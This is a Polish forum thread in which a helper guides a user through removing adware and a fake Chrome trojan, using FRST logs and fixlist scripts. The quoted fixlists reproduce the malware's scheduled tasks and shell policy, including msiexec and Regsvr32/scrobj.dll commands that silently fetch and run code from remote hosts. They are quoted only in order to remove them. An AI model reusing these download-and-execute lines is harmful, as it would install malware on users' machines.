Wirusy przeglądarkowe

26 kwietnia 2017

Witam , tak jak w tytule .

Jestem bezradny. Ostatnio pobrałem program SpyHunter 4 - Malware Security. Niestety wyszukało wiele wirusów ... Nie moge ich usunąć , ponieważ trzeba wykupić antywirus.

http://screenshot.sh/odFXUa6IIwYMZ

http://screenshot.sh/oe5OibjumOwdn

http://screenshot.sh/m7SyiR7yUULcF

http://screenshot.sh/m8WtV1G2jErvL

http://screenshot.sh/n9qdjeD5sOzgh

http://screenshot.sh/mMArN0lyKJutn

http://screenshot.sh/m3GyVb85iL8H5

http://screenshot.sh/m3HXoyDRzrCoJ

http://screenshot.sh/m3flBnnXKGXff

Nie wiem skąd to się znalazło. Miałem antywirusa McAfee , ale mi sie skończył i przez pół roku miałem Windows Defender. Macie jakies porady?

Chciałbym zrobić format systemu , ale nie wiem jak i 2 słyszałem , że usuwa się system , a ja nie dostałem płyty z win 10 , poniewaz kupiłem gotowca. Może przywracanie systemu ? Ale też nie wiem jak i jakie będą konsekwencje... Proszę o pomoc.

26 kwietnia 2017

Zrób logi z FRST > http://www.forumpc.pl/topic/277786-nieingerencyjne-narzędzia-do-tworzenia-logów-systemowych/?p=2010191
przed skanem zaznacz: Additional.txt Shortcut.txt,

Edytowane 26 kwietnia 2017 przez Twój_Anioł_Stróż

27 kwietnia 2017

EDIT: http://www80.zippyshare.com/v/WqtcohiH/file.html

Tutaj są jednak 3 : FRST , Addition , Shortcut

Edytowane 27 kwietnia 2017 przez Pulsik

27 kwietnia 2017

Cytuj

C:\Users\filip\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
C:\Users\filip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)

Te skróty dam do usuwania, bo przekierowują do fałszywej przeglądarki C:\Program Files (x86)\Eastness\Application\chrome.exe, która wygląda jak Google Chrome, ale w rzeczywistości jest Trojanem.
Potem zrobisz sobie nowe skróty w tych samych lokalizacjach.

1) Spróbuj odinstalować ten program:

YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: - ELEX DO BRASIL PARTICIPAÇÕES LTDA) <==== UWAGA

2) SPYHUNTER - spróbuj odinstalować w ten sposób:
kliknij na tę ikonkę C:\Users\nazwa Użytkownika\Start Menu\Programs\SpyHunter\Uninstall.lnk (czyli >>START >>Programy>>SpyHunter>>Uninstall)
wyskoczy okienko, ale zamiast klikać wielki zielony guzik "continue" kliknij "no, thanks". To drugie odinstalowuje.

3) Otwórz Notatnik i wklej w nim:

Cytuj

Task: {0BA317B3-89B7-4830-94C9-2ACB625251D2} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q

Task: {2C011F0B-297A-4019-9F08-49CE35E181FE} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj85RYVLF8U4MTQSRWY2MUQWFTNQMTM8RUI4N8VYNjExRH== scrobj.dll
Task: {51716896-5C93-4495-8056-BD8387822437} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== UWAGA
Task: {98F3A7A0-C28A-48E9-B309-8D0764B577EE} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj85RYVLF8U4MTQSRWY2MUQWFTNQMTM8RUI4N8VYNjExRH== scrobj.dll
C:\Users\filip\Desktop\Google Chrome.lnk
C:\Users\filip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
RemoveDirectory: C:\Program Files (x86)\Eastness
RemoveDirectory: C:\Program Files\Enigma Software Group
RemoveDirectory: C:\Program Files (x86)\MIO
RemoveDirectory: C:\Users\filip\AppData\Roaming\Firefox
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\filip\AppData\Local\SNARE
HKU\S-1-5-21-4068356181-1141750104-2350535618-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj85RYVLF8U4MTQSRWY2MUQWFTNQMTM8RUI4N8VYNjExRH== /q
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\taskmgr.exe: [Debugger]
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
HKU\S-1-5-21-4068356181-1141750104-2350535618-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
HKU\S-1-5-21-4068356181-1141750104-2350535618-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4068356181-1141750104-2350535618-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4068356181-1141750104-2350535618-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-4068356181-1141750104-2350535618-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
Edge HomeButtonPage: HKU\S-1-5-21-4068356181-1141750104-2350535618-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF"
CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
CHR DefaultSearchKeyword: Default -> ourluckysites
HKU\S-1-5-21-4068356181-1141750104-2350535618-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [106496 2017-04-17] () [Brak podpisu cyfrowego]
C:\ProgramData\Software\Apple\Apps\Notification.dll
HKU\S-1-5-21-4068356181-1141750104-2350535618-1001\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
CustomCLSID: HKU\S-1-5-21-4068356181-1141750104-2350535618-1001_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\filip\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku
Task: {43BD82CC-9744-474A-B761-D762F1474E9F} - System32\Tasks\SpyHunter4Startup => C:\Program Files\Enigma Software Group\SpyHunter\Spyhunter4.exe [2017-04-26] (Enigma Software Group USA, LLC.)
FirewallRules: [{901192E8-4251-4C0A-9EF7-D4181924419D}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
FirewallRules: [{6C561370-B243-4B35-8F0C-3AAD52C509E8}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{E772D82B-626D-4230-BACA-9C3CE1995C79}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{8078E3B1-C130-4446-B48C-F06317D84983}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000dx001-sshd-8gb_z4yd2hpfxxxxz4yd2hpf.dat
FirewallRules: [{9E15D2BA-7030-4920-8B11-294F8C54C473}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000dx001-sshd-8gb_z4yd2hpfxxxxz4yd2hpf.dat
R2 SNARE; C:\Users\filip\AppData\Local\SNARE\Snare.dll [802816 2017-04-24] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
R3 esgiguard; C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [15920 2017-04-26] (Enigma Software Group USA, LLC.)
C:\WINDOWS\Minidump\*.dmp
2017-04-26 20:30 - 2017-04-26 20:30 - 00003442 _____ C:\WINDOWS\System32\Tasks\SpyHunter4Startup
2017-04-26 20:30 - 2017-04-26 20:30 - 00001139 _____ C:\Users\filip\Desktop\SpyHunter.lnk
2017-04-26 20:30 - 2017-04-26 20:30 - 00000000 ____D C:\Users\filip\AppData\Roaming\Enigma Software Group
2017-04-26 20:30 - 2017-04-26 20:30 - 00000000 ____D C:\sh4ldr
2017-04-26 20:28 - 2017-04-26 20:28 - 00022704 _____ C:\WINDOWS\system32\Drivers\EsgScanner.sys
2017-04-26 20:28 - 2017-04-26 20:28 - 00000000 ____D C:\Program Files\Enigma Software Group
2017-04-26 20:27 - 2017-04-26 20:28 - 03516080 _____ (Enigma Software Group USA, LLC.) C:\Users\filip\Downloads\sh-remover.exe
2017-04-25 14:35 - 2017-04-25 14:35 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-04-24 13:32 - 2017-04-24 13:32 - 00003546 _____ C:\WINDOWS\System32\Tasks\T0528
2017-04-20 08:46 - 2017-04-25 14:38 - 00000000 _____ C:\WINDOWS\SysWOW64\22
2017-04-20 08:46 - 2017-04-25 14:38 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-04-20 08:41 - 2017-04-21 13:13 - 00000000 ____D C:\Program Files (x86)\MK
2017-04-19 12:25 - 2017-04-27 08:36 - 00000000 ____D C:\Users\filip\AppData\Local\3DM
2017-04-17 17:13 - 2017-04-17 17:13 - 00000000 ____D C:\WINDOWS\system32\log
2017-04-17 17:13 - 2017-04-17 17:13 - 00000000 ____D C:\Users\filip\AppData\Roaming\Elex-tech
2017-04-17 17:13 - 2017-04-17 17:13 - 00000000 ____D C:\Program Files (x86)\Elex-tech
2017-04-17 17:13 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys
2017-04-17 17:13 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys
2017-04-17 17:12 - 2017-04-26 14:10 - 00002080 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-17 17:12 - 2017-04-26 14:10 - 00002010 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-17 17:12 - 2017-04-25 14:59 - 00000000 ____D C:\Users\filip\AppData\LocalLow\Mozilla
2017-04-17 17:12 - 2017-04-17 17:12 - 00000000 ____D C:\Users\filip\AppData\Roaming\Firefox
2017-04-17 17:12 - 2017-04-17 17:12 - 00000000 ____D C:\Users\filip\AppData\Local\Firefox
2017-04-17 17:11 - 2017-04-17 17:11 - 00000000 ____D C:\Users\filip\AppData\Local\Eastness
2017-04-17 17:11 - 2017-04-17 17:11 - 00000000 ____D C:\ProgramData\Software
2017-04-17 17:11 - 2017-04-17 17:11 - 00000000 ____D C:\Program Files (x86)\Eastness
2017-04-17 17:10 - 2017-04-27 13:59 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-17 17:10 - 2017-04-27 09:16 - 00000000 ____D C:\Users\filip\AppData\Local\Kitty
2017-04-17 17:10 - 2017-04-26 21:02 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-17 17:10 - 2017-04-25 14:36 - 00003680 _____ C:\WINDOWS\System32\Tasks\Milimili
2017-04-17 17:10 - 2017-04-25 14:35 - 00000000 ____D C:\Users\filip\AppData\Roaming\WinSAPSvc
2017-04-17 17:10 - 2017-04-25 14:35 - 00000000 ____D C:\Users\filip\AppData\Local\SNARE
2017-04-17 17:10 - 2017-04-17 17:10 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-17 17:05 - 2017-04-26 14:09 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-04-13 14:35 - 2017-04-13 14:36 - 00003688 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
2017-04-13 14:34 - 2017-04-13 14:34 - 00000000 ____D C:\Users\filip\AppData\Roaming\SSMgre
2017-04-17 17:12 - 2016-09-30 22:33 - 00000000 ____D C:\Users\filip\AppData\Roaming\Mozilla
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
HOSTS:
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe
Uruchom FRST i kliknij przycisk Fix (NAPRAW).

4) Zrób nowe logi FRST

Edytowane 27 kwietnia 2017 przez Twój_Anioł_Stróż

27 kwietnia 2017

Kliknąłem okej:

http://screenshot.sh/mE9Umtf0Yz9Ep

Nwm czy dokładnie o to chodziło , aby umieścić obok FRST.exe

http://screenshot.sh/n9MdDmwM5OC3n

Tutaj są logi:

http://www38.zippyshare.com/v/VT56RPfG/file.html

Jakby było pytanie czemu nie ma niektórych programów , np: Action to odinstalowałem.

27 kwietnia 2017

Cytuj

Uruchomiony z C:\Users\filip\Downloads

"fixlist" umieść w tym folderze.

i potem wszystko dalej powtórz

27 kwietnia 2017

http://screenshot.sh/n9Gnmk5y4jcfP

Okej czyli jak Downloads to tutaj , tak jak te wszystkie Logi , które tam mi sie zapisywały.

http://www88.zippyshare.com/v/KZgTVOer/file.html

Tutaj są.

27 kwietnia 2017

Powtórz usuwanie.

Daj z tego usuwania raport.

I nowe logi.

27 kwietnia 2017

Usuwanie czego? Tego YAC(Yet Another Cleaner!) i SpyHunter ? Nie moge tego nigdzie znaleźć . Przepraszam za moje rozgarnięcie , ale nie jestem w stanie zrozumieć co mam usunąć .

27 kwietnia 2017

Usuwanie przy pomocy "fixlist" powtórz, bo nic się nie usunęło.

27 kwietnia 2017

Wydaje mi sie , że problem był w tym , że kodowanie było UTF-8 zamiast Unicode .

Prosze , mam nadzieję , że teraz działa. http://www94.zippyshare.com/v/JV5TiQvF/file.html

27 kwietnia 2017

Nie wiem, co robisz źle, ale nic się nie usunęło.

Powtórka:

Otwórz Notatnik i wklej w nim:

Cytuj

HKU\S-1-5-21-4068356181-1141750104-2350535618-1001\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA

Task: {0BA317B3-89B7-4830-94C9-2ACB625251D2} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
Task: {2C011F0B-297A-4019-9F08-49CE35E181FE} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj85RYVLF8U4MTQSRWY2MUQWFTNQMTM8RUI4N8VYNjExRH== scrobj.dll
Task: {51716896-5C93-4495-8056-BD8387822437} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== UWAGA
Task: {98F3A7A0-C28A-48E9-B309-8D0764B577EE} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj85RYVLF8U4MTQSRWY2MUQWFTNQMTM8RUI4N8VYNjExRH== scrobj.dll
C:\Users\filip\Desktop\Google Chrome.lnk
C:\Users\filip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
RemoveDirectory: C:\Program Files (x86)\Eastness
RemoveDirectory: C:\Program Files (x86)\MIO
RemoveDirectory: C:\Users\filip\AppData\Local\SNARE
RemoveDirectory: C:\Users\filip\AppData\Local\Kitty
RemoveDirectory: C:\ProgramData\SWCUTemp
RemoveDirectory: C:\Program Files\MK
FirewallRules: [{8EF2315E-B686-4398-B0BA-FD205B22D02F}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000dx001-sshd-8gb_z4yd2hpfxxxxz4yd2hpf.dat
FirewallRules: [{73D1AC15-8F1D-4E94-BBCB-53C7AEEFAFF5}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000dx001-sshd-8gb_z4yd2hpfxxxxz4yd2hpf.dat
HKU\S-1-5-21-4068356181-1141750104-2350535618-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj85RYVLF8U4MTQSRWY2MUQWFTNQMTM8RUI4N8VYNjExRH== /q
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\taskmgr.exe: [Debugger]
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
HKU\S-1-5-21-4068356181-1141750104-2350535618-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
HKU\S-1-5-21-4068356181-1141750104-2350535618-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4068356181-1141750104-2350535618-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4068356181-1141750104-2350535618-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-4068356181-1141750104-2350535618-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
Edge HomeButtonPage: HKU\S-1-5-21-4068356181-1141750104-2350535618-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
FF Extension: (SimilarWeb) - C:\Users\filip\AppData\Roaming\Firefox\Firefox\Profiles\tatzmvhw.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-04-25] [Brak podpisu cyfrowego]
FF Extension: (HSearch) - C:\Users\filip\AppData\Roaming\Firefox\Firefox\Profiles\tatzmvhw.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-25] [Brak podpisu cyfrowego]
FF Extension: (FF Adr) - C:\Users\filip\AppData\Roaming\Firefox\Firefox\Profiles\tatzmvhw.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-17] [Brak podpisu cyfrowego]
FF SearchPlugin: C:\Users\filip\AppData\Roaming\Firefox\Firefox\Profiles\tatzmvhw.default\searchplugins\startsearch.xml [2017-04-25]
CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF
CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF"
CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&ts=1492598388&z=e82cb386735911eeded99b4gaz7t3ocw5tbb1c5q9c&from=che0812&uid=ST1000DX001-SSHD-8GB_Z4YD2HPFXXXXZ4YD2HPF&q={searchTerms}
CHR DefaultSearchKeyword: Default -> ourluckysites
HKU\S-1-5-21-4068356181-1141750104-2350535618-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
R2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [106496 2017-04-17] () [Brak podpisu cyfrowego]
C:\ProgramData\Software\Apple\Apps\Notification.dll
R2 SNARE; C:\Users\filip\AppData\Local\SNARE\Snare.dll [833536 2017-04-27] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
R2 Kitty; C:\Users\filip\AppData\Local\Kitty\Kitty.dll [553472 2017-04-25] (kitty) [Brak podpisu cyfrowego] <==== UWAGA
